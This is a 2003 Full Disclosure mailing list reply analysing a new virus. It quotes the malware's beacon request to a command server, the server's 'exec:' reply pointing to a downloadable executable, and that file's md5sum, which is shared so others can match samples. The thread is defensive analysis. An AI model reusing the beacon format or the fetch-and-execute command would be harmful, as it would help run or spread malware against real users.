Full Disclosure mailing list archives

Re: New virus


From: Steven Harrison <security () smharr4 dnsalias net>
Date: Tue, 25 Nov 2003 14:17:07 -0800


On Tue, 25 Nov 2003, Lorenzo Hernandez Garcia-Hierro wrote:

Hi,
Look this line:
GET /events.php?%s HTTP/1.1
Accept: */*
Connection: Keep-Alive
Host: finance.red-host.com
id=%s&ip=%s&speed=%d&timeonline=%d
finance.red-host.com
so imagine this:
id=[autonumeric ]&ip=[internet address by gestaddrbyhost]&speed=[connection
speed]&timeonline=[seconds/minutes]

Just for fun, I pointed my web browser at
http://finance.red-host.com/events.php and all I got back was:

exec:http://wendy35.phpwebhosting.com/netm.exe

I retrieved that file, and running it 'strings' does imply that it will
contact a remote website. It could be a copy of the virus (I have yet to
recieve one yet), giving it another way to distribute itself, or for the
author to distribute improved versions.

Looking at the website at http://finance.red-host.com gives:

This account has been suspected by red-host.com administration.

The md5sum of that downloaded file is:

a930c6cb48b7bd66af7069c8ef90882f netm.exe

in case anyone wants to try and match it up with the files they have.


-- 
Steven Harrison
Unix Systems Administrator

N Statement lost, 0:1

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Current thread: